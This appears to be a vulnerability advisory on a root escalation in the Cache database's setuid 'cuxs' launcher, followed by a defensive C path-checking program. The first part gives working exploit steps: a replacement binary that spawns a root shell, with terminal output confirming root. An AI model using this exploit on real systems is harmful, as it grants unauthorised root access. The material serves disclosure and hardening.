A user who is a member of the group configured at installation to start and stop the Cache database can get local root access by exploiting poor file permissions and the use of relative path names in setuid binaries, using the following method:

1. mv /path/to/cache/bin/cache /path/to/cache/bin/cache.orig
2. cd /path/to/cache/bin
3. cat > cache.c << 'EOF'
#include <stdlib.h>
#include <unistd.h>

/* replacement "cache": runs as root because cuxs is setuid root */
int main(void)
{
    setuid(0);
    setgid(0);
    system("/bin/sh");
    return 0;
}
EOF
4. gcc cache.c -o cache
5. ./cuxs

Details:

cuxs is setuid root and, at installation of the Cache database, can be configured to be executable by a specific group. cuxs is the control program for Cache; it starts Cache with a path relative to the current directory, via the following system call:

    execve("../bin/cache", ["cache"], ...)

Since by default bin is world-writable, the cache binary can be moved aside and replaced by a malicious one, which cuxs then executes as root:

[lwc@boureguard lwc]$ cd /usr/ecache
[lwc@boureguard ecache]$ ls -ld bin;cd bin
drwxrwxrwx    2 root     root         4096 Mar 18 07:13 bin
[lwc@boureguard bin]$ mv cache cache.orig
[lwc@boureguard bin]$ gcc cache.c -o cache
[lwc@boureguard bin]$ id
uid=500(lwc) gid=500(lwc) groups=500(lwc),10(wheel)
[lwc@boureguard bin]$ ls -l cuxs
-rwsr-x---    1 root     wheel       16488 Mar 18 06:49 cuxs
[lwc@boureguard bin]$ ./cuxs
sh-2.05a# id
uid=0(root) gid=0(root) groups=500(lwc),10(wheel)
sh-2.05a#
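The two weaknesses above are a cwd-relative execve() target and a target directory anyone can write to. The following C program is an added example, not code from the advisory and not InterSystems' cuxs source: it is the pre-exec check a hardened setuid launcher could run, refusing relative paths, canonicalising the target, and walking every component of the resolved path to reject untrusted ownership or group/world write bits. The function names safe_to_exec, check_path and run_scenario are assumptions, and run_scenario builds a constructed throwaway tree under /tmp instead of touching a real Cache install.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#ifndef PATH_MAX
#define PATH_MAX 4096
#endif

/* Verdict for a launcher target: 1 = safe to execve(), 0 = refuse (reason in
 * `why`). Besides root, `trusted_uid` may own the file and its ancestors. */
int safe_to_exec(const char *path, uid_t trusted_uid, char *why, size_t whylen)
{
    char prefix[PATH_MAX];
    struct stat st;

    /* cuxs's execve("../bin/cache", ...) resolved against the caller's cwd;
     * a setuid launcher must only exec a fixed absolute path. */
    if (path == NULL || path[0] != '/') {
        snprintf(why, whylen, "refusing relative path");
        return 0;
    }
    /* Canonicalise so a symlink cannot aim the check at one file and
     * execve() at another. */
    if (realpath(path, prefix) == NULL) {
        snprintf(why, whylen, "realpath: %s", strerror(errno));
        return 0;
    }
    if (stat(prefix, &st) != 0 || !S_ISREG(st.st_mode)) {
        snprintf(why, whylen, "not a regular file");
        return 0;
    }
    /* Walk from the file up to "/": each component must be owned by root or
     * trusted_uid and not be group/world writable. A sticky directory such
     * as /tmp passes, since others cannot rename or unlink entries they do
     * not own there; the advisory's 0777 bin directory has no sticky bit. */
    for (;;) {
        if (stat(prefix, &st) != 0) {
            snprintf(why, whylen, "stat %s: %s", prefix, strerror(errno));
            return 0;
        }
        if (st.st_uid != 0 && st.st_uid != trusted_uid) {
            snprintf(why, whylen, "%s owned by uid %u", prefix, (unsigned)st.st_uid);
            return 0;
        }
        int sticky_dir = S_ISDIR(st.st_mode) && (st.st_mode & S_ISVTX);
        if ((st.st_mode & (S_IWGRP | S_IWOTH)) && !sticky_dir) {
            snprintf(why, whylen, "%s is group/world writable", prefix);
            return 0;
        }
        if (strcmp(prefix, "/") == 0)
            break;
        char *slash = strrchr(prefix, '/');
        if (slash == prefix)
            prefix[1] = '\0';          /* parent of "/foo" is "/" */
        else
            *slash = '\0';
    }
    snprintf(why, whylen, "ok");
    return 1;
}

/* Wrapper trusting the caller's own uid; prints the reason to stderr. */
int check_path(const char *path)
{
    char why[256];
    int ok = safe_to_exec(path, getuid(), why, sizeof why);
    fprintf(stderr, "%s -> %s\n", path, why);
    return ok;
}

/* Constructed fixture: <tmp>/bin/cache with bin set to `binmode` (the
 * advisory found 0777 on a default install). Returns the verdict. */
int run_scenario(mode_t binmode)
{
    char root[] = "/tmp/cuxs_check.XXXXXX";
    char bin[PATH_MAX], cache[PATH_MAX];
    int verdict = -1;

    if (mkdtemp(root) == NULL)
        return -1;
    snprintf(bin, sizeof bin, "%s/bin", root);
    snprintf(cache, sizeof cache, "%s/bin/cache", root);
    if (mkdir(bin, 0755) == 0 && chmod(bin, binmode) == 0) {
        int fd = open(cache, O_WRONLY | O_CREAT | O_EXCL, 0755);
        if (fd >= 0) {
            close(fd);
            chmod(cache, 0755);        /* override umask */
            verdict = check_path(cache);
            unlink(cache);
        }
        rmdir(bin);
    }
    rmdir(root);
    return verdict;
}

int main(int argc, char **argv)
{
    if (argc > 1)                      /* audit a real path, e.g. /usr/ecache/bin/cache */
        return check_path(argv[1]) ? 0 : 1;
    printf("bin 0777 -> %d, bin 0755 -> %d, relative -> %d\n",
           run_scenario(0777), run_scenario(0755), check_path("../bin/cache"));
    return 0;
}
```

Two caveats. First, a check-then-execve sequence is still racy while the directory stays writable, so the check is a diagnostic and a last line of defence; the actual fix is a root-owned bin directory without group/world write bits and a compiled-in absolute path in the launcher. Second, a setuid launcher should pass a fixed uid (root) as trusted_uid rather than getuid(), which check_path uses only so the example can run unprivileged.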